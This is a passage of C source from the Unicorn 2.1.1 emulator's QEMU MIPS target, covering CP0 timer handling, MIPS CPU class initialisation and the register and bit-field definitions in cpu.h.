next); } /* Expire the timer. */ static void cpu_mips_timer_expire(CPUMIPSState *env) { cpu_mips_timer_update(env); if (env->insn_flags & ISA_MIPS32R2) { env->CP0_Cause |= 1 << CP0Ca_TI; } qemu_irq_raise(env->irq[(env->CP0_IntCtl >> CP0IntCtl_IPTI) & 0x7]); } uint32_t cpu_mips_get_count(CPUMIPSState *env) { if (env->CP0_Cause & (1 << CP0Ca_DC)) { return env->CP0_Count; } else { uint64_t now; now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); if (timer_pending(env->timer) && timer_expired(env->timer, now)) { /* The timer has already expired. */ cpu_mips_timer_expire(env); } return env->CP0_Count + (uint32_t)(now / TIMER_PERIOD); } } void cpu_mips_store_count(CPUMIPSState *env, uint32_t count) { /* * This gets called from cpu_state_reset(), potentially before timer init. * So env->timer may be NULL, which is also the case with KVM enabled so * treat timer as disabled in that case. */ if (env->CP0_Cause & (1 << CP0Ca_DC) || !env->timer) { env->CP0_Count = count; } else { /* Store new count register */ env->CP0_Count = count - (uint32_t)(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / TIMER_PERIOD); /* Update timer timer */ cpu_mips_timer_update(env); } } void cpu_mips_store_compare(CPUMIPSState *env, uint32_t value) { env->CP0_Compare = value; if (!(env->CP0_Cause & (1 << CP0Ca_DC))) { cpu_mips_timer_update(env); } if (env->insn_flags & ISA_MIPS32R2) { env->CP0_Cause &= ~(1 << CP0Ca_TI); } qemu_irq_lower(env->irq[(env->CP0_IntCtl >> CP0IntCtl_IPTI) & 0x7]); } void cpu_mips_start_count(CPUMIPSState *env) { cpu_mips_store_count(env, env->CP0_Count); } void cpu_mips_stop_count(CPUMIPSState *env) { /* Store the current value */ env->CP0_Count += (uint32_t)(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / TIMER_PERIOD); } static void mips_timer_cb(void *opaque) { CPUMIPSState *env; env = opaque; if (env->CP0_Cause & (1 << CP0Ca_DC)) { return; } /* * ??? This callback should occur when the counter is exactly equal to * the comparator value. Offset the count by one to avoid immediately * retriggering the callback before any virtual time has passed. */ env->CP0_Count++; cpu_mips_timer_expire(env); env->CP0_Count--; } void cpu_mips_clock_init(MIPSCPU *cpu) { CPUMIPSState *env = &cpu->env; /* * If we're in KVM mode, don't create the periodic timer, that is handled in * kernel. 
*/ if (!kvm_enabled()) { env->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &mips_timer_cb, env); } } #endif

unicorn-2.1.1/qemu/target/mips/cpu-param.h

/* * MIPS cpu parameters for qemu. * * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef MIPS_CPU_PARAM_H #define MIPS_CPU_PARAM_H 1 #ifdef TARGET_MIPS64 # define TARGET_LONG_BITS 64 #else # define TARGET_LONG_BITS 32 #endif #ifdef TARGET_MIPS64 #define TARGET_PHYS_ADDR_SPACE_BITS 48 #define TARGET_VIRT_ADDR_SPACE_BITS 48 #else #define TARGET_PHYS_ADDR_SPACE_BITS 40 #define TARGET_VIRT_ADDR_SPACE_BITS 32 #endif #define TARGET_PAGE_BITS 12 #define NB_MMU_MODES 4 #endif

unicorn-2.1.1/qemu/target/mips/cpu-qom.h

/* * QEMU MIPS CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_MIPS_CPU_QOM_H #define QEMU_MIPS_CPU_QOM_H #include "hw/core/cpu.h" #ifdef TARGET_MIPS64 #define TYPE_MIPS_CPU "mips64-cpu" #else #define TYPE_MIPS_CPU "mips-cpu" #endif #define MIPS_CPU(obj) ((MIPSCPU *)obj) #define MIPS_CPU_CLASS(klass) ((MIPSCPUClass *)klass) #define MIPS_CPU_GET_CLASS(obj) (&((MIPSCPU *)obj)->cc) /** * MIPSCPUClass: * @parent_reset: The parent class' reset handler. * * A MIPS CPU model.
*/ typedef struct MIPSCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); } MIPSCPUClass; typedef struct MIPSCPU MIPSCPU; #endif

unicorn-2.1.1/qemu/target/mips/cpu.c

/* * QEMU MIPS CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include <uc_priv.h> static void mips_cpu_set_pc(CPUState *cs, vaddr value) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; env->active_tc.PC = value & ~(target_ulong)1; if (value & 1) { env->hflags |= MIPS_HFLAG_M16; } else { env->hflags &= ~(MIPS_HFLAG_M16); } } static void mips_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; env->active_tc.PC = tb->pc; env->hflags &= ~MIPS_HFLAG_BMASK; env->hflags |= tb->flags & MIPS_HFLAG_BMASK; } static bool mips_cpu_has_work(CPUState *cs) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; bool has_work = false; /* * Prior to MIPS Release 6 it is implementation dependent whether non-enabled * interrupts wake up the CPU; however, most implementations only * check for interrupts that can be taken. */ if ((cs->interrupt_request & CPU_INTERRUPT_HARD) && cpu_mips_hw_interrupts_pending(env)) { if (cpu_mips_hw_interrupts_enabled(env) || (env->insn_flags & ISA_MIPS32R6)) { has_work = true; } } /* MIPS-MT has the ability to halt the CPU. */ if (env->CP0_Config3 & (1 << CP0C3_MT)) { /* * The QEMU model will issue an _WAKE request whenever the CPUs * should be woken up. */ if (cs->interrupt_request & CPU_INTERRUPT_WAKE) { has_work = true; } if (!mips_vpe_active(env)) { has_work = false; } } /* MIPS Release 6 has the ability to halt the CPU.
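* The check below mirrors the MT case above: a pending CPU_INTERRUPT_WAKE
* marks the VP as runnable, while an inactive VP reports no work.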
*/ if (env->CP0_Config5 & (1 << CP0C5_VP)) { if (cs->interrupt_request & CPU_INTERRUPT_WAKE) { has_work = true; } if (!mips_vp_active(env, cs)) { has_work = false; } } return has_work; } static void mips_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); MIPSCPU *cpu = MIPS_CPU(s); MIPSCPUClass *mcc = MIPS_CPU_GET_CLASS(cpu); CPUMIPSState *env = &cpu->env; mcc->parent_reset(dev); memset(env, 0, offsetof(CPUMIPSState, end_reset_fields)); cpu_state_reset(env); } static void mips_cpu_realizefn(CPUState *dev) { CPUState *cs = CPU(dev); MIPSCPU *cpu = MIPS_CPU(dev); cpu_exec_realizefn(cs); cpu_mips_realize_env(&cpu->env); cpu_reset(cs); } static void mips_cpu_initfn(struct uc_struct *uc, CPUState *obj) { MIPSCPU *cpu = MIPS_CPU(obj); CPUMIPSState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); } static void mips_cpu_class_init(CPUClass *c) { MIPSCPUClass *mcc = MIPS_CPU_CLASS(c); CPUClass *cc = CPU_CLASS(c); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ mcc->parent_reset = cc->reset; /* overwrite CPUClass->reset with the arch reset: mips_cpu_reset(). */ cc->reset = mips_cpu_reset; cc->has_work = mips_cpu_has_work; cc->do_interrupt = mips_cpu_do_interrupt; cc->cpu_exec_interrupt = mips_cpu_exec_interrupt; cc->set_pc = mips_cpu_set_pc; cc->synchronize_from_tb = mips_cpu_synchronize_from_tb; cc->do_unaligned_access = mips_cpu_do_unaligned_access; cc->get_phys_page_debug = mips_cpu_get_phys_page_debug; cc->tcg_initialize = mips_tcg_init; cc->tlb_fill_cpu = mips_cpu_tlb_fill; } MIPSCPU *cpu_mips_init(struct uc_struct *uc) { MIPSCPU *cpu; CPUState *cs; CPUClass *cc; CPUMIPSState *env; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } #ifdef TARGET_MIPS64 if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_MIPS64_R4000; // R4000 } else if (uc->cpu_model + UC_CPU_MIPS32_I7200 + 1 >= mips_defs_number) { free(cpu); return NULL; } #else if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_MIPS32_74KF; // 74kf } else if (uc->cpu_model >= mips_defs_number) { free(cpu); return NULL; } #endif cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = cs; cpu_class_init(uc, cc); mips_cpu_class_init(cc); cpu_common_initfn(uc, cs); mips_cpu_initfn(uc, cs); env = &cpu->env; env->cpu_model = &(mips_defs[uc->cpu_model]); if (env->cpu_model == NULL) { free(cpu); return NULL; } mips_cpu_realizefn(cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); return cpu; }

unicorn-2.1.1/qemu/target/mips/cpu.h

#ifndef MIPS_CPU_H #define MIPS_CPU_H #include "cpu-qom.h" #include "exec/cpu-defs.h" #include "fpu/softfloat-types.h" #include "mips-defs.h" #define TCG_GUEST_DEFAULT_MO (0) typedef struct CPUMIPSTLBContext CPUMIPSTLBContext; /* MSA Context */ #define MSA_WRLEN (128) typedef union wr_t wr_t; union wr_t { int8_t b[MSA_WRLEN / 8];
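/* All four member arrays alias the same 128 bits of storage, so e.g.
 * writing d[0] also rewrites b[0..7], h[0..3] and w[0..1]; which
 * elements overlap depends on host endianness. */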
int16_t h[MSA_WRLEN / 16]; int32_t w[MSA_WRLEN / 32]; int64_t d[MSA_WRLEN / 64]; }; typedef union fpr_t fpr_t; union fpr_t { float64 fd; /* ieee double precision */ float32 fs[2];/* ieee single precision */ uint64_t d; /* binary double fixed-point */ uint32_t w[2]; /* binary single fixed-point */ /* FPU/MSA register mapping is not tested on big-endian hosts. */ wr_t wr; /* vector data */ }; /* *define FP_ENDIAN_IDX to access the same location * in the fpr_t union regardless of the host endianness */ #if defined(HOST_WORDS_BIGENDIAN) # define FP_ENDIAN_IDX 1 #else # define FP_ENDIAN_IDX 0 #endif typedef struct CPUMIPSFPUContext CPUMIPSFPUContext; struct CPUMIPSFPUContext { /* Floating point registers */ fpr_t fpr[32]; float_status fp_status; /* fpu implementation/revision register (fir) */ uint32_t fcr0; #define FCR0_FREP 29 #define FCR0_UFRP 28 #define FCR0_HAS2008 23 #define FCR0_F64 22 #define FCR0_L 21 #define FCR0_W 20 #define FCR0_3D 19 #define FCR0_PS 18 #define FCR0_D 17 #define FCR0_S 16 #define FCR0_PRID 8 #define FCR0_REV 0 /* fcsr */ uint32_t fcr31_rw_bitmask; uint32_t fcr31; #define FCR31_FS 24 #define FCR31_ABS2008 19 #define FCR31_NAN2008 18 #define SET_FP_COND(num, env) do { ((env).fcr31) |= \ ((num) ? (1 << ((num) + 24)) : \ (1 << 23)); \ } while (0) #define CLEAR_FP_COND(num, env) do { ((env).fcr31) &= \ ~((num) ? (1 << ((num) + 24)) : \ (1 << 23)); \ } while (0) #define GET_FP_COND(env) ((((env).fcr31 >> 24) & 0xfe) | \ (((env).fcr31 >> 23) & 0x1)) #define GET_FP_CAUSE(reg) (((reg) >> 12) & 0x3f) #define GET_FP_ENABLE(reg) (((reg) >> 7) & 0x1f) #define GET_FP_FLAGS(reg) (((reg) >> 2) & 0x1f) #define SET_FP_CAUSE(reg, v) do { (reg) = ((reg) & ~(0x3f << 12)) | \ ((v & 0x3f) << 12); \ } while (0) #define SET_FP_ENABLE(reg, v) do { (reg) = ((reg) & ~(0x1f << 7)) | \ ((v & 0x1f) << 7); \ } while (0) #define SET_FP_FLAGS(reg, v) do { (reg) = ((reg) & ~(0x1f << 2)) | \ ((v & 0x1f) << 2); \ } while (0) #define UPDATE_FP_FLAGS(reg, v) do { (reg) |= ((v & 0x1f) << 2); } while (0) #define FP_INEXACT 1 #define FP_UNDERFLOW 2 #define FP_OVERFLOW 4 #define FP_DIV0 8 #define FP_INVALID 16 #define FP_UNIMPLEMENTED 32 }; #define TARGET_INSN_START_EXTRA_WORDS 2 typedef struct CPUMIPSMVPContext CPUMIPSMVPContext; struct CPUMIPSMVPContext { int32_t CP0_MVPControl; #define CP0MVPCo_CPA 3 #define CP0MVPCo_STLB 2 #define CP0MVPCo_VPC 1 #define CP0MVPCo_EVP 0 int32_t CP0_MVPConf0; #define CP0MVPC0_M 31 #define CP0MVPC0_TLBS 29 #define CP0MVPC0_GS 28 #define CP0MVPC0_PCP 27 #define CP0MVPC0_PTLBE 16 #define CP0MVPC0_TCA 15 #define CP0MVPC0_PVPE 10 #define CP0MVPC0_PTC 0 int32_t CP0_MVPConf1; #define CP0MVPC1_CIM 31 #define CP0MVPC1_CIF 30 #define CP0MVPC1_PCX 20 #define CP0MVPC1_PCP2 10 #define CP0MVPC1_PCP1 0 }; typedef struct mips_def_t mips_def_t; #define MIPS_SHADOW_SET_MAX 16 #define MIPS_TC_MAX 5 #define MIPS_FPU_MAX 1 #define MIPS_DSP_ACC 4 #define MIPS_KSCRATCH_NUM 6 #define MIPS_MAAR_MAX 16 /* Must be an even number. 
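* (MAARs are used in pairs, each pair bounding one speculative-access
* address range, which is presumably why the count has to stay even.)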
*/ /* * Summary of CP0 registers * ======================== * * * Register 0 Register 1 Register 2 Register 3 * ---------- ---------- ---------- ---------- * * 0 Index Random EntryLo0 EntryLo1 * 1 MVPControl VPEControl TCStatus GlobalNumber * 2 MVPConf0 VPEConf0 TCBind * 3 MVPConf1 VPEConf1 TCRestart * 4 VPControl YQMask TCHalt * 5 VPESchedule TCContext * 6 VPEScheFBack TCSchedule * 7 VPEOpt TCScheFBack TCOpt * * * Register 4 Register 5 Register 6 Register 7 * ---------- ---------- ---------- ---------- * * 0 Context PageMask Wired HWREna * 1 ContextConfig PageGrain SRSConf0 * 2 UserLocal SegCtl0 SRSConf1 * 3 XContextConfig SegCtl1 SRSConf2 * 4 DebugContextID SegCtl2 SRSConf3 * 5 MemoryMapID PWBase SRSConf4 * 6 PWField PWCtl * 7 PWSize * * * Register 8 Register 9 Register 10 Register 11 * ---------- ---------- ----------- ----------- * * 0 BadVAddr Count EntryHi Compare * 1 BadInstr * 2 BadInstrP * 3 BadInstrX * 4 GuestCtl1 GuestCtl0Ext * 5 GuestCtl2 * 6 SAARI GuestCtl3 * 7 SAAR * * * Register 12 Register 13 Register 14 Register 15 * ----------- ----------- ----------- ----------- * * 0 Status Cause EPC PRId * 1 IntCtl EBase * 2 SRSCtl NestedEPC CDMMBase * 3 SRSMap CMGCRBase * 4 View_IPL View_RIPL BEVVA * 5 SRSMap2 NestedExc * 6 GuestCtl0 * 7 GTOffset * * * Register 16 Register 17 Register 18 Register 19 * ----------- ----------- ----------- ----------- * * 0 Config LLAddr WatchLo0 WatchHi * 1 Config1 MAAR WatchLo1 WatchHi * 2 Config2 MAARI WatchLo2 WatchHi * 3 Config3 WatchLo3 WatchHi * 4 Config4 WatchLo4 WatchHi * 5 Config5 WatchLo5 WatchHi * 6 WatchLo6 WatchHi * 7 WatchLo7 WatchHi * * * Register 20 Register 21 Register 22 Register 23 * ----------- ----------- ----------- ----------- * * 0 XContext Debug * 1 TraceControl * 2 TraceControl2 * 3 UserTraceData1 * 4 TraceIBPC * 5 TraceDBPC * 6 Debug2 * 7 * * * Register 24 Register 25 Register 26 Register 27 * ----------- ----------- ----------- ----------- * * 0 DEPC PerfCnt ErrCtl CacheErr * 1 PerfCnt * 2 TraceControl3 PerfCnt * 3 UserTraceData2 PerfCnt * 4 PerfCnt * 5 PerfCnt * 6 PerfCnt * 7 PerfCnt * * * Register 28 Register 29 Register 30 Register 31 * ----------- ----------- ----------- ----------- * * 0 DataLo DataHi ErrorEPC DESAVE * 1 TagLo TagHi * 2 DataLo1 DataHi1 KScratch<n> * 3 TagLo1 TagHi1 KScratch<n> * 4 DataLo2 DataHi2 KScratch<n> * 5 TagLo2 TagHi2 KScratch<n> * 6 DataLo3 DataHi3 KScratch<n> * 7 TagLo3 TagHi3 KScratch<n> * */ #define CP0_REGISTER_00 0 #define CP0_REGISTER_01 1 #define CP0_REGISTER_02 2 #define CP0_REGISTER_03 3 #define CP0_REGISTER_04 4 #define CP0_REGISTER_05 5 #define CP0_REGISTER_06 6 #define CP0_REGISTER_07 7 #define CP0_REGISTER_08 8 #define CP0_REGISTER_09 9 #define CP0_REGISTER_10 10 #define CP0_REGISTER_11 11 #define CP0_REGISTER_12 12 #define CP0_REGISTER_13 13 #define CP0_REGISTER_14 14 #define CP0_REGISTER_15 15 #define CP0_REGISTER_16 16 #define CP0_REGISTER_17 17 #define CP0_REGISTER_18 18 #define CP0_REGISTER_19 19 #define CP0_REGISTER_20 20 #define CP0_REGISTER_21 21 #define CP0_REGISTER_22 22 #define CP0_REGISTER_23 23 #define CP0_REGISTER_24 24 #define CP0_REGISTER_25 25 #define CP0_REGISTER_26 26 #define CP0_REGISTER_27 27 #define CP0_REGISTER_28 28 #define CP0_REGISTER_29 29 #define CP0_REGISTER_30 30 #define CP0_REGISTER_31 31 /* CP0 Register 00 */ #define CP0_REG00__INDEX 0 #define CP0_REG00__MVPCONTROL 1 #define CP0_REG00__MVPCONF0 2 #define CP0_REG00__MVPCONF1 3 #define CP0_REG00__VPCONTROL 4 /* CP0 Register 01 */ #define CP0_REG01__RANDOM 0 #define CP0_REG01__VPECONTROL 1 #define 
CP0_REG01__VPECONF0 2 #define CP0_REG01__VPECONF1 3 #define CP0_REG01__YQMASK 4 #define CP0_REG01__VPESCHEDULE 5 #define CP0_REG01__VPESCHEFBACK 6 #define CP0_REG01__VPEOPT 7 /* CP0 Register 02 */ #define CP0_REG02__ENTRYLO0 0 #define CP0_REG02__TCSTATUS 1 #define CP0_REG02__TCBIND 2 #define CP0_REG02__TCRESTART 3 #define CP0_REG02__TCHALT 4 #define CP0_REG02__TCCONTEXT 5 #define CP0_REG02__TCSCHEDULE 6 #define CP0_REG02__TCSCHEFBACK 7 /* CP0 Register 03 */ #define CP0_REG03__ENTRYLO1 0 #define CP0_REG03__GLOBALNUM 1 #define CP0_REG03__TCOPT 7 /* CP0 Register 04 */ #define CP0_REG04__CONTEXT 0 #define CP0_REG04__CONTEXTCONFIG 1 #define CP0_REG04__USERLOCAL 2 #define CP0_REG04__XCONTEXTCONFIG 3 #define CP0_REG04__DBGCONTEXTID 4 #define CP0_REG04__MMID 5 /* CP0 Register 05 */ #define CP0_REG05__PAGEMASK 0 #define CP0_REG05__PAGEGRAIN 1 #define CP0_REG05__SEGCTL0 2 #define CP0_REG05__SEGCTL1 3 #define CP0_REG05__SEGCTL2 4 #define CP0_REG05__PWBASE 5 #define CP0_REG05__PWFIELD 6 #define CP0_REG05__PWSIZE 7 /* CP0 Register 06 */ #define CP0_REG06__WIRED 0 #define CP0_REG06__SRSCONF0 1 #define CP0_REG06__SRSCONF1 2 #define CP0_REG06__SRSCONF2 3 #define CP0_REG06__SRSCONF3 4 #define CP0_REG06__SRSCONF4 5 #define CP0_REG06__PWCTL 6 /* CP0 Register 07 */ #define CP0_REG07__HWRENA 0 /* CP0 Register 08 */ #define CP0_REG08__BADVADDR 0 #define CP0_REG08__BADINSTR 1 #define CP0_REG08__BADINSTRP 2 #define CP0_REG08__BADINSTRX 3 /* CP0 Register 09 */ #define CP0_REG09__COUNT 0 #define CP0_REG09__SAARI 6 #define CP0_REG09__SAAR 7 /* CP0 Register 10 */ #define CP0_REG10__ENTRYHI 0 #define CP0_REG10__GUESTCTL1 4 #define CP0_REG10__GUESTCTL2 5 #define CP0_REG10__GUESTCTL3 6 /* CP0 Register 11 */ #define CP0_REG11__COMPARE 0 #define CP0_REG11__GUESTCTL0EXT 4 /* CP0 Register 12 */ #define CP0_REG12__STATUS 0 #define CP0_REG12__INTCTL 1 #define CP0_REG12__SRSCTL 2 #define CP0_REG12__SRSMAP 3 #define CP0_REG12__VIEW_IPL 4 #define CP0_REG12__SRSMAP2 5 #define CP0_REG12__GUESTCTL0 6 #define CP0_REG12__GTOFFSET 7 /* CP0 Register 13 */ #define CP0_REG13__CAUSE 0 #define CP0_REG13__VIEW_RIPL 4 #define CP0_REG13__NESTEDEXC 5 /* CP0 Register 14 */ #define CP0_REG14__EPC 0 #define CP0_REG14__NESTEDEPC 2 /* CP0 Register 15 */ #define CP0_REG15__PRID 0 #define CP0_REG15__EBASE 1 #define CP0_REG15__CDMMBASE 2 #define CP0_REG15__CMGCRBASE 3 #define CP0_REG15__BEVVA 4 /* CP0 Register 16 */ #define CP0_REG16__CONFIG 0 #define CP0_REG16__CONFIG1 1 #define CP0_REG16__CONFIG2 2 #define CP0_REG16__CONFIG3 3 #define CP0_REG16__CONFIG4 4 #define CP0_REG16__CONFIG5 5 #define CP0_REG16__CONFIG6 6 #define CP0_REG16__CONFIG7 7 /* CP0 Register 17 */ #define CP0_REG17__LLADDR 0 #define CP0_REG17__MAAR 1 #define CP0_REG17__MAARI 2 /* CP0 Register 18 */ #define CP0_REG18__WATCHLO0 0 #define CP0_REG18__WATCHLO1 1 #define CP0_REG18__WATCHLO2 2 #define CP0_REG18__WATCHLO3 3 #define CP0_REG18__WATCHLO4 4 #define CP0_REG18__WATCHLO5 5 #define CP0_REG18__WATCHLO6 6 #define CP0_REG18__WATCHLO7 7 /* CP0 Register 19 */ #define CP0_REG19__WATCHHI0 0 #define CP0_REG19__WATCHHI1 1 #define CP0_REG19__WATCHHI2 2 #define CP0_REG19__WATCHHI3 3 #define CP0_REG19__WATCHHI4 4 #define CP0_REG19__WATCHHI5 5 #define CP0_REG19__WATCHHI6 6 #define CP0_REG19__WATCHHI7 7 /* CP0 Register 20 */ #define CP0_REG20__XCONTEXT 0 /* CP0 Register 21 */ /* CP0 Register 22 */ /* CP0 Register 23 */ #define CP0_REG23__DEBUG 0 #define CP0_REG23__TRACECONTROL 1 #define CP0_REG23__TRACECONTROL2 2 #define CP0_REG23__USERTRACEDATA1 3 #define CP0_REG23__TRACEIBPC 4 #define 
CP0_REG23__TRACEDBPC 5 #define CP0_REG23__DEBUG2 6 /* CP0 Register 24 */ #define CP0_REG24__DEPC 0 /* CP0 Register 25 */ #define CP0_REG25__PERFCTL0 0 #define CP0_REG25__PERFCNT0 1 #define CP0_REG25__PERFCTL1 2 #define CP0_REG25__PERFCNT1 3 #define CP0_REG25__PERFCTL2 4 #define CP0_REG25__PERFCNT2 5 #define CP0_REG25__PERFCTL3 6 #define CP0_REG25__PERFCNT3 7 /* CP0 Register 26 */ #define CP0_REG26__ERRCTL 0 /* CP0 Register 27 */ #define CP0_REG27__CACHERR 0 /* CP0 Register 28 */ #define CP0_REG28__TAGLO 0 #define CP0_REG28__DATALO 1 #define CP0_REG28__TAGLO1 2 #define CP0_REG28__DATALO1 3 #define CP0_REG28__TAGLO2 4 #define CP0_REG28__DATALO2 5 #define CP0_REG28__TAGLO3 6 #define CP0_REG28__DATALO3 7 /* CP0 Register 29 */ #define CP0_REG29__TAGHI 0 #define CP0_REG29__DATAHI 1 #define CP0_REG29__TAGHI1 2 #define CP0_REG29__DATAHI1 3 #define CP0_REG29__TAGHI2 4 #define CP0_REG29__DATAHI2 5 #define CP0_REG29__TAGHI3 6 #define CP0_REG29__DATAHI3 7 /* CP0 Register 30 */ #define CP0_REG30__ERROREPC 0 /* CP0 Register 31 */ #define CP0_REG31__DESAVE 0 #define CP0_REG31__KSCRATCH1 2 #define CP0_REG31__KSCRATCH2 3 #define CP0_REG31__KSCRATCH3 4 #define CP0_REG31__KSCRATCH4 5 #define CP0_REG31__KSCRATCH5 6 #define CP0_REG31__KSCRATCH6 7 typedef struct TCState TCState; struct TCState { target_ulong gpr[32]; target_ulong PC; target_ulong HI[MIPS_DSP_ACC]; target_ulong LO[MIPS_DSP_ACC]; target_ulong ACX[MIPS_DSP_ACC]; target_ulong DSPControl; int32_t CP0_TCStatus; #define CP0TCSt_TCU3 31 #define CP0TCSt_TCU2 30 #define CP0TCSt_TCU1 29 #define CP0TCSt_TCU0 28 #define CP0TCSt_TMX 27 #define CP0TCSt_RNST 23 #define CP0TCSt_TDS 21 #define CP0TCSt_DT 20 #define CP0TCSt_DA 15 #define CP0TCSt_A 13 #define CP0TCSt_TKSU 11 #define CP0TCSt_IXMT 10 #define CP0TCSt_TASID 0 int32_t CP0_TCBind; #define CP0TCBd_CurTC 21 #define CP0TCBd_TBE 17 #define CP0TCBd_CurVPE 0 target_ulong CP0_TCHalt; target_ulong CP0_TCContext; target_ulong CP0_TCSchedule; target_ulong CP0_TCScheFBack; int32_t CP0_Debug_tcstatus; target_ulong CP0_UserLocal; int32_t msacsr; #define MSACSR_FS 24 #define MSACSR_FS_MASK (1 << MSACSR_FS) #define MSACSR_NX 18 #define MSACSR_NX_MASK (1 << MSACSR_NX) #define MSACSR_CEF 2 #define MSACSR_CEF_MASK (0xffff << MSACSR_CEF) #define MSACSR_RM 0 #define MSACSR_RM_MASK (0x3 << MSACSR_RM) #define MSACSR_MASK (MSACSR_RM_MASK | MSACSR_CEF_MASK | MSACSR_NX_MASK | \ MSACSR_FS_MASK) float_status msa_fp_status; /* Upper 64-bit MMRs (multimedia registers); the lower 64-bit are GPRs */ uint64_t mmr[32]; #define NUMBER_OF_MXU_REGISTERS 16 target_ulong mxu_gpr[NUMBER_OF_MXU_REGISTERS - 1]; target_ulong mxu_cr; #define MXU_CR_LC 31 #define MXU_CR_RC 30 #define MXU_CR_BIAS 2 #define MXU_CR_RD_EN 1 #define MXU_CR_MXU_EN 0 }; struct MIPSITUState; typedef struct CPUMIPSState CPUMIPSState; struct CPUMIPSState { TCState active_tc; CPUMIPSFPUContext active_fpu; uint32_t current_tc; uint32_t current_fpu; uint32_t SEGBITS; uint32_t PABITS; #if defined(TARGET_MIPS64) # define PABITS_BASE 36 #else # define PABITS_BASE 32 #endif target_ulong SEGMask; uint64_t PAMask; #define PAMASK_BASE ((1ULL << PABITS_BASE) - 1) int32_t msair; #define MSAIR_ProcID 8 #define MSAIR_Rev 0 /* * CP0 Register 0 */ int32_t CP0_Index; /* CP0_MVP* are per MVP registers. 
*/ int32_t CP0_VPControl; #define CP0VPCtl_DIS 0 /* * CP0 Register 1 */ int32_t CP0_Random; int32_t CP0_VPEControl; #define CP0VPECo_YSI 21 #define CP0VPECo_GSI 20 #define CP0VPECo_EXCPT 16 #define CP0VPECo_TE 15 #define CP0VPECo_TargTC 0 int32_t CP0_VPEConf0; #define CP0VPEC0_M 31 #define CP0VPEC0_XTC 21 #define CP0VPEC0_TCS 19 #define CP0VPEC0_SCS 18 #define CP0VPEC0_DSC 17 #define CP0VPEC0_ICS 16 #define CP0VPEC0_MVP 1 #define CP0VPEC0_VPA 0 int32_t CP0_VPEConf1; #define CP0VPEC1_NCX 20 #define CP0VPEC1_NCP2 10 #define CP0VPEC1_NCP1 0 target_ulong CP0_YQMask; target_ulong CP0_VPESchedule; target_ulong CP0_VPEScheFBack; int32_t CP0_VPEOpt; #define CP0VPEOpt_IWX7 15 #define CP0VPEOpt_IWX6 14 #define CP0VPEOpt_IWX5 13 #define CP0VPEOpt_IWX4 12 #define CP0VPEOpt_IWX3 11 #define CP0VPEOpt_IWX2 10 #define CP0VPEOpt_IWX1 9 #define CP0VPEOpt_IWX0 8 #define CP0VPEOpt_DWX7 7 #define CP0VPEOpt_DWX6 6 #define CP0VPEOpt_DWX5 5 #define CP0VPEOpt_DWX4 4 #define CP0VPEOpt_DWX3 3 #define CP0VPEOpt_DWX2 2 #define CP0VPEOpt_DWX1 1 #define CP0VPEOpt_DWX0 0 /* * CP0 Register 2 */ uint64_t CP0_EntryLo0; /* * CP0 Register 3 */ uint64_t CP0_EntryLo1; #if defined(TARGET_MIPS64) # define CP0EnLo_RI 63 # define CP0EnLo_XI 62 #else # define CP0EnLo_RI 31 # define CP0EnLo_XI 30 #endif int32_t CP0_GlobalNumber; #define CP0GN_VPId 0 /* * CP0 Register 4 */ target_ulong CP0_Context; int32_t CP0_MemoryMapID; /* * CP0 Register 5 */ int32_t CP0_PageMask; int32_t CP0_PageGrain_rw_bitmask; int32_t CP0_PageGrain; #define CP0PG_RIE 31 #define CP0PG_XIE 30 #define CP0PG_ELPA 29 #define CP0PG_IEC 27 target_ulong CP0_SegCtl0; target_ulong CP0_SegCtl1; target_ulong CP0_SegCtl2; #define CP0SC_PA 9 #define CP0SC_PA_MASK (0x7FULL << CP0SC_PA) #define CP0SC_PA_1GMASK (0x7EULL << CP0SC_PA) #define CP0SC_AM 4 #define CP0SC_AM_MASK (0x7ULL << CP0SC_AM) #define CP0SC_AM_UK 0ULL #define CP0SC_AM_MK 1ULL #define CP0SC_AM_MSK 2ULL #define CP0SC_AM_MUSK 3ULL #define CP0SC_AM_MUSUK 4ULL #define CP0SC_AM_USK 5ULL #define CP0SC_AM_UUSK 7ULL #define CP0SC_EU 3 #define CP0SC_EU_MASK (1ULL << CP0SC_EU) #define CP0SC_C 0 #define CP0SC_C_MASK (0x7ULL << CP0SC_C) #define CP0SC_MASK (CP0SC_C_MASK | CP0SC_EU_MASK | CP0SC_AM_MASK | \ 